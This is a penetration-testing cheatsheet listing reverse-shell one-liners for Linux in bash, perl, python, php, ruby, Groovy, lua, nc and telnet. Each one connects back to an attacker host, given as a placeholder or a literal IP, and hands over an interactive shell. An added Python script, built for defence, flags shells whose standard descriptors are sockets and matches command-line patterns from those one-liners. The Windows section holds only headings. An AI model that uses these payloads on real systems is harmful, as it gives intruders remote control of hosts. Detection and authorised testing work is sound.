How to get a reverse shell

Introduction
During penetration testing you frequently need a reverse shell, for example from a web application or from a database. This article collects the reverse shell techniques worked out by various researchers as a cheatsheet.

Status: still being compiled

Table of contents

  • Creating a reverse shell on Linux
  • Creating a reverse shell on Windows

Reverse shell on Linux

1. Upload a reverse shell file (script or trojan)

2. bash

$ /bin/bash -i >& /dev/tcp/<Attackip>/<Attackport> 0>&1

This command has topped the list in penetration testing for years and is the first choice for a reverse shell, but it fails on some systems: the /dev/tcp pseudo-device is a bash feature, so the redirection does not work when the command runs under another shell (such as dash) or under a bash build without network redirection support. It has been tested and works on CentOS.

3. perl

$ perl -e 'use Socket;$i="<Attackip>";$p=<Attackport>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl is an interpreter shipped with most Linux systems; when the bash command cannot produce a reverse shell, this command is the preferred alternative.

4. python

$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attackip>",<Attackport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5. php

$ php -r '$sock=fsockopen("<Attackip>",<Attackport>);exec("/bin/sh -i <&3 >&3 2>&3");'

6. ruby

$ ruby -rsocket -e'f=TCPSocket.open("<Attackip>",<Attackport>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

7. java (the snippet below is written in Groovy syntax)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

8. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('<Attackip>','<Attackport>');os.execute('/bin/sh -i <&3 >&3 2>&3');"

9. nc

nc -e /bin/sh <Attackip> <Attackport>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Attackip> <Attackport> >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

10. nc
1) Using the -e parameter

2) Without the -e parameter

# Victim
mknod /tmp/backpipe p

# Victim
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

11. telnet

mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
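Every Linux variant above ends the same way: a shell or interpreter process whose standard input, output and error are attached to a TCP socket instead of a terminal or a pipe. That is what a defender can look for. The script below is an added example for host-based detection and is not part of the original cheatsheet; it reads /proc/<pid>/fd on a live Linux host and flags shells with socket-backed std descriptors, and as a second signal matches process command lines against fragments of the one-liners listed above. The process names in SHELL_NAMES, the signature list and the sample process snapshot are all constructed for this example and are assumptions to adjust per environment.

```python
import os
import re
from dataclasses import dataclass, field

# Shells and interpreters that the one-liners above hand a socket to (assumed list).
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "perl", "python", "python3",
               "php", "ruby", "lua", "nc", "ncat", "telnet"}

# Command-line fragments taken from the cheatsheet entries above.
CMDLINE_SIGNATURES = [
    re.compile(r"/dev/tcp/"),               # bash network redirection
    re.compile(r"\bnc\b.*\s-e\s"),          # nc -e /bin/sh
    re.compile(r"mkfifo|mknod\s+\S+\s+p"),  # named-pipe relay variants
    re.compile(r"dup2\(.*fileno\(\)"),      # python fd duplication onto a socket
    re.compile(r"fsockopen\("),             # php
    re.compile(r"TCPSocket\.open"),         # ruby
    re.compile(r"socket\.tcp\(\)"),         # lua
]


@dataclass
class ProcInfo:
    pid: int
    comm: str           # contents of /proc/<pid>/comm
    cmdline: str        # /proc/<pid>/cmdline with NULs replaced by spaces
    fds: dict = field(default_factory=dict)   # fd number -> readlink() target


def socket_std_fds(proc):
    """Return which of fds 0, 1, 2 resolve to a socket (e.g. 'socket:[38210]')."""
    return sorted(fd for fd in (0, 1, 2)
                  if proc.fds.get(fd, "").startswith("socket:["))


def matched_signatures(proc):
    """Return the patterns from CMDLINE_SIGNATURES found in the command line."""
    return [p.pattern for p in CMDLINE_SIGNATURES if p.search(proc.cmdline)]


def assess(proc):
    """Return a list of reasons to flag this process; an empty list means benign."""
    reasons = []
    name = os.path.basename(proc.comm)
    fds = socket_std_fds(proc)
    if name in SHELL_NAMES and fds:
        reasons.append(f"{name} has std fds {fds} bound to a socket")
    for sig in matched_signatures(proc):
        reasons.append(f"cmdline matches signature {sig!r}")
    return reasons


def scan(procs):
    """Map pid -> reasons for every process in the snapshot that gets flagged."""
    flagged = {}
    for proc in procs:
        reasons = assess(proc)
        if reasons:
            flagged[proc.pid] = reasons
    return flagged


def live_snapshot():
    """Build a ProcInfo list from /proc (Linux only; unreadable entries are skipped)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
                except OSError:
                    pass    # fd closed, or not ours to inspect without privileges
        except OSError:
            continue        # process exited between listdir() and open()
        procs.append(ProcInfo(pid, comm, cmdline, fds))
    return procs


# Constructed snapshot (not real data): one sshd, one bash wired to a socket,
# one python with a tell-tale command line, one normal terminal bash, one nginx.
SAMPLE_PROCS = [
    ProcInfo(1200, "sshd", "sshd: alice [priv]", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    ProcInfo(4242, "bash", "bash -i", {0: "socket:[38210]", 1: "socket:[38210]", 2: "socket:[38210]"}),
    ProcInfo(4300, "python3", "python3 -c import socket,os;os.dup2(s.fileno(),0)",
             {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}),
    ProcInfo(5100, "bash", "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    ProcInfo(5200, "nginx", "nginx: worker process", {0: "/dev/null", 1: "socket:[999]", 2: "socket:[999]"}),
]

if __name__ == "__main__":
    procs = live_snapshot() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, reasons in scan(procs).items():
        print(pid, "; ".join(reasons))
```

Interactive SSH sessions are not flagged because sshd gives the shell a pseudo-terminal, not the socket itself, so on the sample data only pids 4242 and 4300 are reported. Services that legitimately run a shell with a socket as stdio (inetd-style handlers) will match the first rule and need an allowlist, and the command-line signatures only catch the verbatim patterns from this page, so treat the fd check as the primary signal.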

Reverse shell on Windows

References

Summary of common PowerShell reverse shell methods
